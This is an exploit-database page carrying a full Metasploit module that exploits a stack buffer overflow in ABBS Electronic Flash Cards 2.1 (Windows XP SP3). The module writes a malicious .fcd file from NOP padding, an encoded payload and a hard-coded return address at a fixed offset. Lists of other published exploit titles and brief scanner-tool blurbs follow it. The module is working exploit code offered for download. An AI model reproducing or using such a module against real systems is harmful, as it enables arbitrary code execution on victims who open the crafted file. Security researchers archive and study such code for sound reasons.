Menu

Search for hundreds of thousands of exploits

"ABBS Electronic Flashcards 2.1 - Local Buffer Overflow (Metasploit)"

Author

Exploit author

"James Fitts"

Platform

Exploit platform

windows

Release date

Exploit published date

2011-08-04

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ABBS Electronic Flash Cards 2.1 (FCD File) Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability
					found in ABBS Electronic Flash Cards 2.1. 
					The overflow occurs when an overly long string is passed
					in the fcd file. To execute this fcd file the victim
					has to start to start a new "random" test.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 
					      'h1ch4m',		# Initial Discovery
					      'James Fitts'	# Metasploit Module
					    ],
			'Version'        => '$Revision: $',
			'References'     =>
				[
					[ 'URL', 'http://www.exploit-db.com/exploits/16977' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'DisablePayloadHandler' => 'true',
				},
			'Payload'        =>
				{
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 
						'Windows XP SP3 EN', 
						{ 
							'Ret' => 0x0043cb0f, # call dword ptr ds:[eax] in flashcards.exe
							'Offset' => 4108
						} 
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Mar 14 2011',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME', [ true, 'The file name.',  'msf.fcd']),
				], self.class)
	end

	def exploit
		
		fcd = make_nops(50)
		fcd << payload.encoded
		fcd << make_nops(target['Offset'] - (50 + payload.encoded.length))
		fcd << [target.ret].pack('V')

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(fcd)

	end

end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2017-09-27 "LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)" remote multiple "James Fitts"
2017-09-14 "Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)" remote windows "James Fitts"
2017-09-14 "EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-14 "haneWIN DNS Server 1.5.3 - Remote Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-14 "EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-14 "Lockstep Backup for Workgroups 4.0.3 - Remote Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-14 "KingScada AlarmServer 3.1.2.13 - Remote Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)" remote linux "James Fitts"
2017-09-13 "Infinite Automation Mango Automation - Command Injection (Metasploit)" remote jsp "James Fitts"
2017-09-13 "Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)" remote php "James Fitts"
2017-09-13 "Alienvault OSSIM av-centerd - Util.pm sync_rserver Command Execution (Metasploit)" remote linux "James Fitts"
2017-09-13 "Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit)" remote windows "James Fitts"
2017-09-13 "Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)" webapps windows "James Fitts"
2017-09-13 "Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)" remote java "James Fitts"
2017-09-13 "EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)" remote java "James Fitts"
2017-09-13 "Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Motorola Netopia Netoctopus SDCS - Remote Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Sielco Sistemi Winlog 2.07.16 - Remote Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "ZScada Modbus Buffer 2.0 - Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)" webapps windows "James Fitts"
2017-09-13 "Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit)" webapps windows "James Fitts"
2017-08-01 "Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload" webapps jsp "James Fitts"
2017-08-01 "Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)" webapps jsp "James Fitts"
2014-08-14 "Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)" remote linux "James Fitts"
2014-06-13 "Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)" remote linux "James Fitts"
2011-08-04 "ABBS Audio Media Player 3.0 - Local Buffer Overflow (Metasploit)" local windows "James Fitts"
2011-08-04 "FreeAmp 2.0.7 - '.fat' Local Buffer Overflow (Metasploit)" local windows "James Fitts"
2011-08-04 "ABBS Electronic Flashcards 2.1 - Local Buffer Overflow (Metasploit)" local windows "James Fitts" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected